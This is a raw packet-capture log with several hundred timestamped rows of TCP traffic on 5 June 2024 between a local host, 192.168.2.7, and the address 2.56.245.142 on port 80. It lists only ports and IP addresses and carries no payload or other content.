Jun 5, 2024 18:28:36.831212044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831223011 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831248045 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831267118 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831284046 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831290960 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831295967 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831312895 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831324100 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831334114 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831336975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831336975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831343889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831356049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831366062 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831381083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831382036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831393957 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831408024 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831408978 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831414938 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831435919 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831437111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831448078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831458092 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831468105 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831470966 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831479073 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831490993 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831494093 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831501961 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831516027 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831516027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831517935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831521988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831532955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831536055 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831542969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831553936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831562042 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831569910 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831588984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831592083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831592083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831600904 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831614971 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831628084 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831634045 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831639051 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831648111 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831649065 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831660986 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831670046 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831671000 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831681013 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831690073 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831692934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831702948 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831717968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831722021 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831723928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831726074 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831726074 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831728935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831733942 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831747055 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831765890 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831768990 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831775904 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831787109 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831794024 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831804991 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831818104 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831821918 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831821918 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831832886 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831836939 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831842899 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831851959 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831852913 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831864119 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831871986 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831873894 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831885099 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831895113 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831895113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831904888 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831921101 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831923008 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831923962 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831937075 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831943035 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831948042 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831958055 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831968069 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831971884 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831976891 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831988096 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831988096 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831998110 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832007885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832019091 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832020044 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832030058 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832041025 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832046032 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832051992 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832051992 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832056046 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832067966 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832077980 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832087040 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832089901 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832104921 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832115889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832127094 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832127094 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832127094 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832138062 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832184076 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832185030 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832472086 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832489967 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832530975 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832552910 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832561970 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832567930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832581997 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832595110 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832632065 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832632065 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832679987 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832683086 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832690001 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832699060 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832716942 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832725048 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832726955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832736969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832746983 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832762003 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832762003 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832766056 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832776070 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832792044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832796097 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832802057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832819939 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832822084 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832830906 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832843065 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832844973 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832844973 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832853079 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832864046 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832876921 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832879066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832894087 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.832902908 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832910061 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.832973003 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833004951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833015919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833026886 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833038092 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833050013 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833060026 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833071947 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833086967 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833156109 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833167076 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833183050 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833194017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833204031 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833221912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833233118 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833242893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833246946 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833246946 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833252907 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833262920 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833272934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833283901 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833286047 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833295107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833304882 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833308935 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833308935 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833316088 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833331108 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833333015 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833339930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833349943 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833353996 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833360910 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833369017 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833372116 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.833374977 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.833529949 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.834517002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835452080 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835577965 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835612059 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835623026 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835633993 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835644007 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835659027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835669994 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835680008 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835683107 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835690022 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835700989 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835704088 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835711002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835711002 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835721970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835732937 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835732937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835742950 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835756063 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835766077 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835772991 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835776091 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835789919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835794926 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835802078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835812092 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835817099 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835822105 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835833073 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835835934 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835843086 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835855007 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835865974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835875988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835880041 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835886955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835896969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835906982 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835906982 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835918903 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835920095 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835932970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835943937 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835943937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835958004 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835968018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835971117 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835971117 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.835978985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.835989952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836000919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836000919 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836013079 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836038113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836038113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836170912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836182117 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836191893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836194992 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836204052 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836214066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836215019 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836225033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836236954 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836246967 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836251974 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836251974 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836262941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836265087 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836268902 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836280107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836285114 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836291075 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836301088 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836312056 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836313963 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836313963 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836321115 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.836344957 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.836517096 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837544918 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837589025 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837599993 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837646008 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837749958 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837762117 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837771893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837781906 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837793112 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837802887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837814093 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837833881 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837836027 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837846994 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837857962 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837867022 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837877035 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837878942 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837888956 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837888956 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837908983 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837917089 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837941885 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837949991 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837960958 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837970972 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837971926 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837981939 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.837986946 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.837992907 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838005066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838016033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838026047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838032961 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.838032961 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.838038921 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838048935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838059902 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838069916 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838073969 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.838080883 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838088989 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.838092089 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838102102 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838107109 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.838114023 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838124990 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838125944 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.838135004 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838145018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.838164091 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.838246107 CEST	49731	80	192.168.2.7	2.56.245.142
